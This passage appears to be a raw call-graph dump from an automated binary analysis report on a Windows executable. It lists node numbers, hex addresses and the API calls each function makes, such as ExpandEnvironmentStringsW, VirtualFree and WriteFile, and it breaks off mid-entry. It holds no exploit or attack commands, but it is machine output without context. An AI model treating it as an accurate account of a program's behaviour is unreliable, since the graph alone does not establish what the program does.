17649->17651 17650->17652 17651->17652 17652->16885 17654 d63b10 ??2@YAPAXI 17653->17654 17656 d63a8e codecvt 17654->17656 17655 d63aef 17657 d63bb0 _DebugHeapAllocator ??2@YAPAXI 17655->17657 17656->17655 17664 d63b30 17656->17664 17658 d63afb 17657->17658 17659 d74cd0 codecvt ??3@YAXPAX 17658->17659 17661 d61633 17659->17661 17661->17642 17662 d63ac1 codecvt 17663 d63ad3 WideCharToMultiByte 17662->17663 17663->17655 17665 d63bb0 _DebugHeapAllocator ??2@YAPAXI 17664->17665 17666 d63b45 codecvt 17665->17666 17672 d63bd0 17666->17672 17669 d63b75 codecvt 17670 d74cd0 codecvt ??3@YAXPAX 17669->17670 17671 d63b80 17670->17671 17671->17662 17673 d63be2 17672->17673 17674 d63b63 strncpy 17672->17674 17676 d78ad0 17673->17676 17674->17669 17677 d78af7 ??2@YAPAXI ??3@YAXPAX 17676->17677 17678 d78ae2 _CxxThrowException 17676->17678 17677->17674 17678->17677 17680 d66a5f 17679->17680 17691 d66900 17680->17691 17684 d669cc 17683->17684 17685 d66900 _wtol 17684->17685 17686 d669fa 17685->17686 17686->16912 17688 d66a0e 17687->17688 17689 d66900 _wtol 17688->17689 17690 d66a31 17689->17690 17690->16915 17693 d66904 17691->17693 17692 d66930 _wtol 17692->17693 17693->17692 17694 d669ad 17693->17694 17694->16912 17696 d6ffea 17695->17696 17715 d70fc0 17696->17715 17698 d70024 17699 d70033 17698->17699 17700 d7005d 17698->17700 17726 d70190 17699->17726 17721 d73c50 17700->17721 17714 d70052 17714->16939 17716 d70fe2 17715->17716 17719 d71006 _Error_objects 17716->17719 17720 d76de0 3 API calls 17716->17720 17717 d71029 17717->17719 17734 d70c60 17717->17734 17719->17698 17720->17717 17768 d73810 17721->17768 17727 d634f0 codecvt 11 API calls 17726->17727 17728 d7004a 17727->17728 17729 d634f0 17728->17729 17730 d63511 17729->17730 17731 d634ff 17729->17731 17730->17714 18851 d6ca20 17731->18851 18855 d84a60 17731->18855 17754 d7a930 17734->17754 17736 d70c7b 17751 d70c87 17736->17751 17757 d74240 17736->17757 17738 d70ce3 codecvt 17739 d70cf4 memcpy 17738->17739 17742 d70d0b codecvt 17739->17742 17740 d70d55 17760 d704f0 ??3@YAXPAX 17740->17760 17742->17740 17743 d70d9e 17742->17743 17744 d70dba 17742->17744 17747 d70f20 memmove 17742->17747 17748 d70e8f memcpy 17742->17748 17753 d76d10 2 API calls 17742->17753 17761 d704f0 ??3@YAXPAX 17743->17761 17762 d704f0 ??3@YAXPAX 17744->17762 17747->17742 17752 d76de0 3 API calls 17748->17752 17749 d70ee4 17763 d704f0 ??3@YAXPAX 17749->17763 17751->17719 17752->17749 17753->17742 17764 d7a890 17754->17764 17758 d7426f 17757->17758 17759 d74258 ??2@YAPAXI 17757->17759 17758->17738 17759->17758 17760->17751 17761->17751 17762->17751 17763->17751 17766 d7a8a7 17764->17766 17765 d7a913 17765->17736 17766->17765 17767 d76d10 2 API calls 17766->17767 17767->17766 17815 d70230 17768->17815 17946 d702f0 17815->17946 17817 d70285 17953 d704c0 ??3@YAXPAX 17817->17953 17819 d702a1 17955 d70390 17946->17955 17952 d7031b 17952->17817 17953->17819 17976 d704c0 ??3@YAXPAX 17955->17976 17957 d703ab 17977 d704c0 ??3@YAXPAX 17957->17977 17959 d703cb 17978 d704c0 ??3@YAXPAX 17959->17978 17961 d703d6 17979 d704c0 ??3@YAXPAX 17961->17979 17963 d703e1 17980 d704c0 ??3@YAXPAX 17963->17980 17965 d703ec 17981 d704c0 ??3@YAXPAX 17965->17981 17967 d703f7 17982 d704c0 ??3@YAXPAX 17967->17982 17969 d70402 17970 d70480 ??3@YAXPAX 17969->17970 17971 d702ff 17970->17971 17972 d70480 17971->17972 17973 d70491 ??3@YAXPAX 17972->17973 17974 d7030d 17972->17974 17973->17974 17975 d704c0 ??3@YAXPAX 17974->17975 17975->17952 17976->17957 17977->17959 17978->17961 17979->17963 17980->17965 17981->17967 17982->17969 18852 d6ca41 18851->18852 18853 d6ca49 18851->18853 18852->17730 18853->18852 18859 d6cab0 18853->18859 18856 d84a89 18855->18856 18857 d84a81 18855->18857 18856->18857 18926 d84ac0 18856->18926 18857->17730 18864 d6cae0 18859->18864 18862 d6cac7 ??3@YAXPAX 18863 d6cad3 18862->18863 18863->18852 18871 d6db30 18864->18871 18872 d6db41 codecvt 18871->18872 18873 d6db88 18872->18873 18890 d6dce0 18872->18890 18895 d704f0 ??3@YAXPAX 18873->18895 18875 d6caf2 18877 d6dac0 18875->18877 18879 d6dad1 codecvt 18877->18879 18878 d6db18 18916 d704f0 ??3@YAXPAX 18878->18916 18879->18878 18911 d6dcb0 18879->18911 18881 d6cafd 18883 d6cb10 18881->18883 18924 d704f0 ??3@YAXPAX 18883->18924 18885 d6cb22 18925 d704f0 ??3@YAXPAX 18885->18925 18887 d6cb2d 18888 d6cb40 codecvt ??3@YAXPAX 18887->18888 18889 d6cabf 18888->18889 18889->18862 18889->18863 18896 d6dd10 18890->18896 18893 d6dcf7 ??3@YAXPAX 18894 d6dd03 18893->18894 18894->18872 18895->18875 18897 d7adb0 codecvt GetLastError CloseHandle WaitForSingleObject SetEvent 18896->18897 18898 d6dd28 18897->18898 18899 d6da30 codecvt 11 API calls 18898->18899 18900 d6dd33 18899->18900 18901 d6da30 codecvt 11 API calls 18900->18901 18902 d6dd3e 18901->18902 18903 d704f0 codecvt ??3@YAXPAX 18902->18903 18904 d6dd49 18903->18904 18905 d704f0 codecvt ??3@YAXPAX 18904->18905 18906 d6dd54 18905->18906 18907 d6dd70 codecvt GetLastError CloseHandle WaitForSingleObject SetEvent 18906->18907 18908 d6dd5c 18907->18908 18909 d6ddf0 codecvt 11 API calls 18908->18909 18910 d6dcef 18909->18910 18910->18893 18910->18894 18917 d6ded0 18911->18917 18914 d6dcc7 ??3@YAXPAX 18915 d6dcd3 18914->18915 18915->18879 18916->18881 18918 d6df00 codecvt GetLastError CloseHandle 18917->18918 18919 d6dee2 18918->18919 18920 d6df00 codecvt GetLastError CloseHandle 18919->18920 18921 d6deed 18920->18921 18922 d6df00 codecvt GetLastError CloseHandle 18921->18922 18923 d6dcbf 18922->18923 18923->18914 18923->18915 18924->18885 18925->18887 18931 d84950 18926->18931 18929 d84ae3 18929->18857 18930 d84ad7 ??3@YAXPAX 18930->18929 18938 d74810 18931->18938 18934 d853d0 codecvt VirtualFree 18935 d8498a 18934->18935 18941 d849a0 18935->18941 18939 d7481b VirtualFree 18938->18939 18940 d74819 18938->18940 18939->18940 18940->18934 18942 d85090 codecvt VirtualFree 18941->18942 18943 d84998 18942->18943 18943->18929 18943->18930 18945 d79282 _DebugHeapAllocator 18944->18945 18950 d78ff0 ??2@YAPAXI 18945->18950 18947 d79294 18951 d71470 memcpy 18947->18951 18949 d616b3 18949->16569 18950->18947 18951->18949 18953 d6651c 18952->18953 18954 d66528 18952->18954 18958 d665a0 18953->18958 18956 d75ca0 3 API calls 18954->18956 18957 d636f4 18956->18957 18957->16957 18957->16959 18959 d62c60 _DebugHeapAllocator 2 API calls 18958->18959 18960 d665b3 18959->18960 18961 d62c60 _DebugHeapAllocator 2 API calls 18960->18961 18962 d665c5 18961->18962 18962->18954 18963->16969 18971 d63d90 18964->18971 18972 d610d0 _Error_objects ??2@YAPAXI 18971->18972 18973 d63d9e 18972->18973 18974 d635b0 7 API calls 18973->18974 18975 d63daa codecvt 18974->18975 18976 d63db3 ExpandEnvironmentStringsW 18975->18976 18977 d63dc3 18976->18977 18978 d63dcd 18976->18978 18980 d74cd0 codecvt ??3@YAXPAX 18977->18980 18979 d635b0 7 API calls 18978->18979 18981 d63de3 codecvt 18979->18981 18982 d63dcb 18980->18982 18983 d63dec ExpandEnvironmentStringsW 18981->18983 18988 d65870 18982->18988 18984 d63dfb 18983->18984 18985 d62370 _DebugHeapAllocator 3 API calls 18984->18985 18986 d63e07 18985->18986 18987 d74cd0 codecvt ??3@YAXPAX 18986->18987 18987->18982 18989 d610d0 _Error_objects ??2@YAPAXI 18988->18989 18990 d6587e 18989->18990 18991 d62370 _DebugHeapAllocator 3 API calls 18990->18991 18992 d6588a 18991->18992 18993 d79450 4 API calls 18992->18993 18994 d65897 18993->18994 18995 d79270 _DebugHeapAllocator 2 API calls 18994->18995 18996 d658a4 18995->18996 19019 d79730 18996->19019 19000 d658bc 19001 d62370 _DebugHeapAllocator 3 API calls 19000->19001 19002 d658c8 19001->19002 19003 d79450 4 API calls 19002->19003 19004 d658d5 19003->19004 19005 d79270 _DebugHeapAllocator 2 API calls 19004->19005 19006 d658e2 19005->19006 19007 d79730 7 API calls 19006->19007 19008 d658f2 19007->19008 19020 d79741 codecvt 19019->19020 19021 d658b4 19020->19021 19030 d79870 19020->19030 19027 d704f0 ??3@YAXPAX 19021->19027 19025 d7975a codecvt 19025->19021 19034 d795a0 19025->19034 19037 d797e0 19025->19037 19041 d796d0 19025->19041 19027->19000 19031 d7987d codecvt 19030->19031 19032 d7989c wcscmp 19031->19032 19033 d798aa 19031->19033 19032->19033 19033->19025 19047 d795e0 wcsstr 19034->19047 19036 d795be 19036->19025 19038 d797f5 19037->19038 19039 d7981a 19038->19039 19048 d79830 memmove 19038->19048 19039->19025 19042 d796e1 codecvt 19041->19042 19043 d79718 19042->19043 19049 d78e80 19042->19049 19043->19025 19047->19036 19048->19039 19050 d790a0 4 API calls 19049->19050 19051 d78e93 19050->19051 19055 d79830 memmove 19051->19055 19053 d78ea6 19055->19053 19057 d610d0 _Error_objects ??2@YAPAXI 19056->19057 19058 d6593e 19057->19058 19059 d62370 _DebugHeapAllocator 3 API calls 19058->19059 19060 d6594a 19059->19060 19061 d79450 4 API calls 19060->19061 19062 d65957 19061->19062 19063 d79270 _DebugHeapAllocator 2 API calls 19062->19063 19064 d65964 19063->19064 19065 d79730 7 API calls 19064->19065 19066 d65974 19065->19066 19125 d704f0 ??3@YAXPAX 19066->19125 19068 d6597c 19069 d62370 _DebugHeapAllocator 3 API calls 19068->19069 19070 d65988 19069->19070 19071 d79450 4 API calls 19070->19071 19072 d65995 19071->19072 19073 d79270 _DebugHeapAllocator 2 API calls 19072->19073 19074 d659a2 19073->19074 19075 d79730 7 API calls 19074->19075 19076 d659b2 19075->19076 19126 d704f0 ??3@YAXPAX 19076->19126 19125->19068 19689 d67490 19682->19689 19686 d79522 _DebugHeapAllocator 19685->19686 19687 d790a0 4 API calls 19686->19687 19688 d79534 19687->19688 19688->17062 19690 d688a0 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 3 API calls 19689->19690 19691 d6732e 19690->19691 19691->17054 19693 d6b273 19692->19693 19694 d6b271 ??3@YAXPAX LocalFree 19692->19694 19700 d6b2b0 19693->19700 19694->17080 19697 d697f0 18 API calls 19698 d6b29d 19697->19698 19699 d68460 codecvt ??3@YAXPAX 19698->19699 19699->19694 19701 d67490 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 3 API calls 19700->19701 19702 d6b282 19701->19702 19702->19697 19718 d76cf0 19703->19718 19724 d78d00 19706->19724 19708 d66b83 19709 d78e20 19708->19709 19710 d78e32 _DebugHeapAllocator 19709->19710 19728 d78be0 19710->19728 19712 d78e44 _DebugHeapAllocator 19712->17096 19732 d76ae0 19713->19732 19716 d76da0 GetLastError 19717 d7704f 19716->19717 19717->17116 19721 d634d0 19718->19721 19722 d76710 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 19721->19722 19723 d634cb 19722->19723 19723->17101 19725 d78d12 _DebugHeapAllocator 19724->19725 19726 d78d23 ??2@YAPAXI ??3@YAXPAX 19725->19726 19727 d78d60 _DebugHeapAllocator 19725->19727 19726->19727 19727->19708 19729 d78c02 19728->19729 19730 d78c00 19728->19730 19731 d78a30 4 API calls 19729->19731 19730->19712 19731->19730 19734 d76af2 19732->19734 19735 d76b25 19734->19735 19736 d76a80 19734->19736 19735->19716 19737 d76a94 19736->19737 19738 d76a9d WriteFile 19736->19738 19737->19738 19739 d76ac4 19738->19739 19739->19734 21712 d6f3f0 21713 d6f419 21712->21713 21714 d6f411 21712->21714 21713->21714 21716 d6f450 21713->21716 21721 d6f480 21716->21721 21719 d6f467 ??3@YAXPAX 21720 d6f473 21719->21720 21720->21714 21726 d6f4b0 21721->21726 21724 d634f0 codecvt 11 API calls 21725 d6f45f 21724->21725 21725->21719 21725->21720 21735 d704f0 ??3@YAXPAX 21726->21735 21728 d6f4c5 21736 d704f0 ??3@YAXPAX 21728->21736 21730 d6f4d3 21737 d6f570 21730->21737 21735->21728 21736->21730 21759 d704f0 ??3@YAXPAX 21737->21759 21739 d6f4e1 21740 d6f4f0 21739->21740 21760 d704f0 ??3@YAXPAX 21740->21760 21742 d6f505 21761 d704f0 ??3@YAXPAX 21742->21761 21744 d6f513 21762 d704f0 ??3@YAXPAX 21744->21762 21746 d6f521 21747 d6f630 codecvt ??3@YAXPAX 21746->21747 21748 d6f52f 21747->21748 21749 d6f630 codecvt ??3@YAXPAX 21748->21749 21750 d6f53d 21749->21750 21751 d6f630 codecvt ??3@YAXPAX 21750->21751 21752 d6f548 21751->21752 21753 d6f630 codecvt ??3@YAXPAX 21752->21753 21754 d6f553 21753->21754 21763 d704f0 ??3@YAXPAX 21754->21763 21756 d6f55e 21757 d6f590 codecvt ??3@YAXPAX 21756->21757 21758 d6f492 21757->21758 21758->21724 21759->21739 21760->21742 21761->21744 21762->21746 21763->21756 21791 d6bdf9 21807 d6be02 codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21791->21807 21792 d6c267 _Error_objects 21793 d6c2a6 ??2@YAPAXI 21792->21793 21794 d6c2bf 21793->21794 21796 d6c2ca codecvt 21793->21796 21795 d6d350 InitializeCriticalSection 21794->21795 21795->21796 21797 d6c342 21796->21797 21803 d6c37f codecvt SafeRWList _Error_objects 21796->21803 21798 d634f0 codecvt 11 API calls 21797->21798 21800 d6c359 21798->21800 21799 d6c5ac 21806 d6dc60 ??2@YAPAXI 21799->21806 21804 d6da30 codecvt 11 API calls 21800->21804 21801 d6bf8b 21802 d634f0 codecvt 11 API calls 21801->21802 21861 d6bf96 codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21802->21861 21803->21799 21810 d6c402 21803->21810 21811 d6c48a ??2@YAPAXI 21803->21811 21805 d6c364 21804->21805 21808 d6d200 ??3@YAXPAX 21805->21808 21831 d6c5ce codecvt 21806->21831 21807->21792 21807->21801 21809 d6bec0 21807->21809 21817 d6bef0 codecvt 21807->21817 21812 d6c36c 21808->21812 21813 d634f0 codecvt 11 API calls 21809->21813 21902 d76de0 3 API calls 21810->21902 21832 d6c479 _Error_objects 21811->21832 21814 d6d2b0 3 API calls 21812->21814 21815 d6bed5 21813->21815 21819 d6bee5 21814->21819 21820 d6d200 ??3@YAXPAX 21815->21820 21816 d6c74d 21908 d704f0 ??3@YAXPAX 21816->21908 21901 d84af0 2 API calls 21817->21901 21818 d6c422 21822 d6c431 21818->21822 21818->21832 21823 d6bedd 21820->21823 21825 d634f0 codecvt 11 API calls 21822->21825 21826 d6d2b0 3 API calls 21823->21826 21824 d6c762 21829 d634f0 codecvt 11 API calls 21824->21829 21830 d6c448 21825->21830 21826->21819 21827 d6c61d SafeRWList 21833 d74ec0 _CxxThrowException 21827->21833 21849 d6c669 codecvt _Error_objects 21827->21849 21828 d6bf28 21828->21801 21838 d6bf59 21828->21838 21835 d6c76d 21829->21835 21836 d634f0 codecvt 11 API calls 21830->21836 21831->21816 21831->21827 21834 d6c4fb ??2@YAPAXI 21832->21834 21837 d6c649 21833->21837 21842 d6c514 21834->21842 21839 d6da30 codecvt 11 API calls 21835->21839 21841 d6c453 21836->21841 21843 d6c650 ??2@YAPAXI 21837->21843 21837->21849 21844 d634f0 codecvt 11 API calls 21838->21844 21846 d6c778 21839->21846 21840 d6c04b 21845 d634f0 codecvt 11 API calls 21840->21845 21847 d6da30 codecvt 11 API calls 21841->21847 21848 d75e30 4 API calls 21842->21848 21843->21849 21850 d6bf70 21844->21850 21851 d6c056 21845->21851 21852 d6d200 ??3@YAXPAX 21846->21852 21853 d6c45e 21847->21853 21874 d6c54f codecvt _Error_objects 21848->21874 21900 d75a00 122 API calls 21849->21900 21854 d6d200 ??3@YAXPAX 21850->21854 21855 d6dc10 ??2@YAPAXI 21851->21855 21856 d6c780 21852->21856 21857 d6d200 ??3@YAXPAX 21853->21857 21858 d6bf78 21854->21858 21859 d6c077 21855->21859 21860 d6d2b0 3 API calls 21856->21860 21862 d6c466 21857->21862 21864 d6d2b0 3 API calls 21858->21864 21865 d6dc60 ??2@YAPAXI 21859->21865 21860->21819 21861->21840 21868 d6c019 21861->21868 21863 d6d2b0 3 API calls 21862->21863 21863->21819 21864->21819 21867 d6c089 21865->21867 21866 d6c703 21869 d634f0 codecvt 11 API calls 21866->21869 21884 d6c0bf 21867->21884 21886 d6c1dd codecvt 21867->21886 21870 d634f0 codecvt 11 API calls 21868->21870 21871 d6c714 21869->21871 21872 d6c030 21870->21872 21907 d704f0 ??3@YAXPAX 21871->21907 21875 d6d200 ??3@YAXPAX 21872->21875 21881 d634f0 codecvt 11 API calls 21874->21881 21877 d6c038 21875->21877 21876 d6c71f 21878 d634f0 codecvt 11 API calls 21876->21878 21879 d6d2b0 3 API calls 21877->21879 21880 d6c72a 21878->21880 21879->21819 21882 d6da30 codecvt 11 API calls 21880->21882 21881->21799 21883 d6c735 21882->21883 21885 d6d200 ??3@YAXPAX 21883->21885 21896 d6c0da codecvt 21884->21896 21903 d704f0 ??3@YAXPAX 21884->21903 21888 d6c73d 21885->21888 21905 d704f0 ??3@YAXPAX 21886->21905 21892 d6d2b0 3 API calls 21888->21892 21890 d6c14b 21904 d704f0 ??3@YAXPAX 21890->21904 21892->21819 21893 d6c25c 21906 d704f0 ??3@YAXPAX 21893->21906 21894 d6c156 21897 d6d200 ??3@YAXPAX 21894->21897 21898 d6c15e 21897->21898 21899 d6d2b0 3 API calls 21898->21899 21899->21819 21900->21866 21901->21828 21902->21818 21903->21890 21904->21894 21905->21893 21906->21792 21907->21876 21908->21824 20326 d698e0 20335 d6d910 20326->20335 20328 d698f9 GetDC 20329 d699dd 20328->20329 20330 d6990d GetSystemMetrics GetSystemMetrics GetSystemMetrics SelectObject DrawTextW 20328->20330 20331 d6999f SelectObject 20330->20331 20336 d6d910 20331->20336 20334 d699d6 ReleaseDC 20334->20329 20335->20328 20336->20334 20356 d718eb 20357 d718f4 codecvt 20356->20357 20358 d70b60 2 API calls 20357->20358 20362 d71d4c codecvt 20357->20362 20359 d71941 20358->20359 20360 d71955 20359->20360 20418 d70ba0 _CxxThrowException 20359->20418 20363 d71aba 20360->20363 20365 d70870 _CxxThrowException 20360->20365 20364 d73dd0 3 API calls 20362->20364 20367 d71b7f 20363->20367 20382 d71b56 codecvt 20363->20382 20424 d70ba0 _CxxThrowException 20363->20424 20366 d71de1 20364->20366 20368 d7197b 20365->20368 20427 d704f0 ??3@YAXPAX 20366->20427 20371 d74b20 2 API calls 20367->20371 20372 d7198f 20368->20372 20419 d70ba0 _CxxThrowException 20368->20419 20374 d71b8c 20371->20374 20380 d719a4 20372->20380 20420 d70ba0 _CxxThrowException 20372->20420 20373 d71de9 20428 d704f0 ??3@YAXPAX 20373->20428 20377 d74b20 2 API calls 20374->20377 20409 d71b9c 20377->20409 20379 d71df1 20385 d715b0 _CxxThrowException 20379->20385 20381 d708c0 _CxxThrowException 20380->20381 20398 d719b6 codecvt 20380->20398 20381->20398 20382->20362 20384 d708c0 _CxxThrowException 20382->20384 20383 d707c0 _CxxThrowException _CxxThrowException 20383->20409 20384->20362 20386 d71e08 20385->20386 20429 d74180 ??3@YAXPAX ??2@YAPAXI 20386->20429 20388 d70ba0 _CxxThrowException 20388->20409 20389 d71cc5 20389->20382 20426 d70ba0 _CxxThrowException 20389->20426 20390 d70b60 2 API calls 20395 d71c54 20390->20395 20393 d717f0 _CxxThrowException 20396 d71e17 codecvt 20393->20396 20394 d717f0 _CxxThrowException 20401 d71e66 20394->20401 20395->20389 20395->20390 20425 d70ba0 _CxxThrowException 20395->20425 20396->20393 20396->20401 20397 d71a44 20400 d71a7c 20397->20400 20404 d70b60 2 API calls 20397->20404 20398->20397 20399 d73e60 4 API calls 20398->20399 20399->20397 20403 d71a90 20400->20403 20423 d70ba0 _CxxThrowException 20400->20423 20401->20394 20402 d71e8b 20401->20402 20405 d71110 _CxxThrowException 20401->20405 20408 d71600 5 API calls 20401->20408 20403->20363 20410 d70b60 2 API calls 20403->20410 20407 d71a5c 20404->20407 20405->20401 20411 d71a6a 20407->20411 20421 d70ba0 _CxxThrowException 20407->20421 20408->20401 20409->20383 20409->20388 20409->20395 20416 d71aa5 20410->20416 20413 d70b60 2 API calls 20411->20413 20414 d71a72 20413->20414 20414->20400 20422 d70ba0 _CxxThrowException 20414->20422 20416->20363 20417 d708c0 _CxxThrowException 20416->20417 20417->20363 20418->20360 20419->20372 20420->20380 20421->20411 20422->20400 20423->20403 20424->20367 20425->20395 20426->20382 20427->20373 20428->20379 20429->20396 20430 d6c095 20431 d6c0ad 20430->20431 20432 d6c0bf 20431->20432 20433 d6c1dd codecvt 20431->20433 20441 d6c0da codecvt 20432->20441 20511 d704f0 ??3@YAXPAX 20432->20511 20513 d704f0 ??3@YAXPAX 20433->20513 20436 d6c14b 20512 d704f0 ??3@YAXPAX 20436->20512 20438 d6c25c 20514 d704f0 ??3@YAXPAX 20438->20514 20439 d6c156 20442 d6d200 ??3@YAXPAX 20439->20442 20443 d6c15e 20442->20443 20444 d6d2b0 3 API calls 20443->20444 20445 d6c166 20444->20445 20446 d6c267 _Error_objects 20447 d6c2a6 ??2@YAPAXI 20446->20447 20448 d6c2bf 20447->20448 20450 d6c2ca codecvt 20447->20450 20449 d6d350 InitializeCriticalSection 20448->20449 20449->20450 20451 d6c342 20450->20451 20455 d6c37f codecvt SafeRWList _Error_objects 20450->20455 20452 d634f0 codecvt 11 API calls 20451->20452 20454 d6c359 20452->20454 20453 d6c5ac 20458 d6dc60 ??2@YAPAXI 20453->20458 20456 d6da30 codecvt 11 API calls 20454->20456 20455->20453 20460 d6c402 20455->20460 20461 d6c48a ??2@YAPAXI 20455->20461 20457 d6c364 20456->20457 20459 d6d200 ??3@YAXPAX 20457->20459 20473 d6c5ce codecvt 20458->20473 20462 d6c36c 20459->20462 20510 d76de0 3 API calls 20460->20510 20474 d6c479 _Error_objects 20461->20474 20463 d6d2b0 3 API calls 20462->20463 20463->20445 20464 d6c74d 20516 d704f0 ??3@YAXPAX 20464->20516 20465 d6c422 20467 d6c431 20465->20467 20465->20474 20469 d634f0 codecvt 11 API calls 20467->20469 20468 d6c762 20471 d634f0 codecvt 11 API calls 20468->20471 20472 d6c448 20469->20472 20470 d6c61d SafeRWList 20475 d74ec0 _CxxThrowException 20470->20475 20487 d6c669 codecvt _Error_objects 20470->20487 20477 d6c76d 20471->20477 20478 d634f0 codecvt 11 API calls 20472->20478 20473->20464 20473->20470 20476 d6c4fb ??2@YAPAXI 20474->20476 20479 d6c649 20475->20479 20482 d6c514 20476->20482 20480 d6da30 codecvt 11 API calls 20477->20480 20481 d6c453 20478->20481 20483 d6c650 ??2@YAPAXI 20479->20483 20479->20487 20484 d6c778 20480->20484 20485 d6da30 codecvt 11 API calls 20481->20485 20486 d75e30 4 API calls 20482->20486 20483->20487 20488 d6d200 ??3@YAXPAX 20484->20488 20489 d6c45e 20485->20489 20499 d6c54f codecvt _Error_objects 20486->20499 20509 d75a00 122 API calls 20487->20509 20490 d6c780 20488->20490 20491 d6d200 ??3@YAXPAX 20489->20491 20492 d6d2b0 3 API calls 20490->20492 20493 d6c466 20491->20493 20492->20445 20494 d6d2b0 3 API calls 20493->20494 20494->20445 20495 d6c703 20496 d634f0 codecvt 11 API calls 20495->20496 20497 d6c714 20496->20497 20515 d704f0 ??3@YAXPAX 20497->20515 20503 d634f0 codecvt 11 API calls 20499->20503 20500 d6c71f 20501 d634f0 codecvt 11 API calls 20500->20501 20502 d6c72a 20501->20502 20504 d6da30 codecvt 11 API calls 20502->20504 20503->20453 20505 d6c735 20504->20505 20506 d6d200 ??3@YAXPAX 20505->20506 20507 d6c73d 20506->20507 20508 d6d2b0 3 API calls 20507->20508 20508->20445 20509->20495 20510->20465 20511->20436 20512->20439 20513->20438 20514->20446 20515->20500 20516->20468 22081 d6c39e 22083 d6c3ad codecvt SafeRWList 22081->22083 22082 d6c5ac 22084 d6dc60 ??2@YAPAXI 22082->22084 22083->22082 22085 d6c402 22083->22085 22086 d6c48a ??2@YAPAXI 22083->22086 22096 d6c5ce codecvt 22084->22096 22134 d76de0 3 API calls 22085->22134 22097 d6c479 _Error_objects 22086->22097 22087 d6c74d 22136 d704f0 ??3@YAXPAX 22087->22136 22088 d6c422 22090 d6c431 22088->22090 22088->22097 22092 d634f0 codecvt 11 API calls 22090->22092 22091 d6c762 22094 d634f0 codecvt 11 API calls 22091->22094 22095 d6c448 22092->22095 22093 d6c61d SafeRWList 22098 d74ec0 _CxxThrowException 22093->22098 22114 d6c669 codecvt _Error_objects 22093->22114 22100 d6c76d 22094->22100 22101 d634f0 codecvt 11 API calls 22095->22101 22096->22087 22096->22093 22099 d6c4fb ??2@YAPAXI 22097->22099 22102 d6c649 22098->22102 22105 d6c514 22099->22105 22103 d6da30 codecvt 11 API calls 22100->22103 22104 d6c453 22101->22104 22106 d6c650 ??2@YAPAXI 22102->22106 22102->22114 22107 d6c778 22103->22107 22108 d6da30 codecvt 11 API calls 22104->22108 22109 d75e30 4 API calls 22105->22109 22106->22114 22110 d6d200 ??3@YAXPAX 22107->22110 22111 d6c45e 22108->22111 22125 d6c54f codecvt _Error_objects 22109->22125 22112 d6c780 22110->22112 22113 d6d200 ??3@YAXPAX 22111->22113 22115 d6d2b0 3 API calls 22112->22115 22116 d6c466 22113->22116 22133 d75a00 122 API calls 22114->22133 22118 d6c46e 22115->22118 22117 d6d2b0 3 API calls 22116->22117 22117->22118 22119 d6c703 22120 d634f0 codecvt 11 API calls 22119->22120 22121 d6c714 22120->22121 22135 d704f0 ??3@YAXPAX 22121->22135 22123 d6c71f 22124 d634f0 codecvt 11 API calls 22123->22124 22126 d6c72a 22124->22126 22127 d634f0 codecvt 11 API calls 22125->22127 22128 d6da30 codecvt 11 API calls 22126->22128 22127->22082 22129 d6c735 22128->22129 22130 d6d200 ??3@YAXPAX 22129->22130 22131 d6c73d 22130->22131 22132 d6d2b0 3 API calls 22131->22132 22132->22118 22133->22119 22134->22088 22135->22123 22136->22091 20616 d6f8b0 20617 d6f8be 20616->20617 20618 d6f920 20617->20618 20619 d6f8ca 20617->20619 20623 d79f70 VariantClear 20618->20623 20622 d6f8d0 20619->20622 20627 d79f70 20619->20627 20631 d7a0a0 20622->20631 20623->20622 20624 d632f0 VariantClear 20626 d6f9ad 20624->20626 20628 d79f8a 20627->20628 20629 d79f82 20627->20629 20628->20622 20637 d7a0f0 20629->20637 20632 d7a0b3 20631->20632 20633 d7a0cd memcpy 20631->20633 20634 d79fb0 VariantClear 20632->20634 20635 d6f99e 20633->20635 20636 d7a0bc 20634->20636 20635->20624 20636->20633 20636->20635 20638 d7a107 20637->20638 20640 d7a103 20637->20640 20641 d7a070 20638->20641 20640->20628 20642 d7a085 20641->20642 20643 d7a081 20641->20643 20645 d79fb0 20642->20645 20643->20640 20646 d79fc3 20645->20646 20647 d7a00c VariantClear 20645->20647 20646->20647 20648 d79fd4 20646->20648 20647->20648 20648->20643 20682 d732ba 20684 d732d0 20682->20684 20683 d707a0 _CxxThrowException 20683->20684 20684->20683 20692 d72dc6 codecvt std::exception::exception 20684->20692 20685 d73e10 3 API calls 20685->20692 20686 d72deb 20688 d717f0 _CxxThrowException 20686->20688 20687 d717f0 _CxxThrowException 20687->20692 20689 d733b2 codecvt 20688->20689 20693 d733cf 20689->20693 20725 d70ba0 _CxxThrowException 20689->20725 20690 d708c0 _CxxThrowException 20690->20692 20692->20685 20692->20686 20692->20687 20692->20690 20694 d706c0 _CxxThrowException 20692->20694 20701 d72650 _CxxThrowException ??3@YAXPAX ??2@YAPAXI 20692->20701 20702 d72760 6 API calls 20692->20702 20706 d70730 _CxxThrowException _CxxThrowException 20692->20706 20708 d726e0 3 API calls 20692->20708 20715 d73d80 2 API calls 20692->20715 20716 d74b20 ??3@YAXPAX ??2@YAPAXI 20692->20716 20719 d73620 2 API calls 20692->20719 20722 d716a0 _CxxThrowException 20692->20722 20723 d741e0 ??3@YAXPAX ??2@YAPAXI 20692->20723 20724 d704f0 ??3@YAXPAX 20692->20724 20695 d73575 20693->20695 20711 d7343a codecvt 20693->20711 20694->20692 20726 d704f0 ??3@YAXPAX 20695->20726 20697 d7357d 20727 d704f0 ??3@YAXPAX 20697->20727 20699 d73585 20728 d704f0 ??3@YAXPAX 20699->20728 20701->20692 20702->20692 20703 d7358d 20704 d73670 3 API calls 20703->20704 20705 d73595 20704->20705 20707 d6f630 codecvt ??3@YAXPAX 20705->20707 20706->20692 20709 d735a7 20707->20709 20708->20692 20729 d704f0 ??3@YAXPAX 20709->20729 20710 d73570 20711->20710 20714 d73f30 3 API calls 20711->20714 20713 d735af 20717 d74390 2 API calls 20713->20717 20714->20710 20715->20692 20716->20692 20718 d735b7 20717->20718 20719->20692 20722->20692 20723->20692 20724->20692 20725->20693 20726->20697 20727->20699 20728->20703 20729->20713 20795 d83ca0 20800 d83cb9 20795->20800 20801 d83caf 20795->20801 20797 d83d77 20798 d7a970 107 API calls 20797->20798 20798->20801 20800->20797 20800->20801 20802 d84200 20800->20802 20807 d7a970 20800->20807 20804 d84220 20802->20804 20803 d8423f 20803->20800 20804->20803 20811 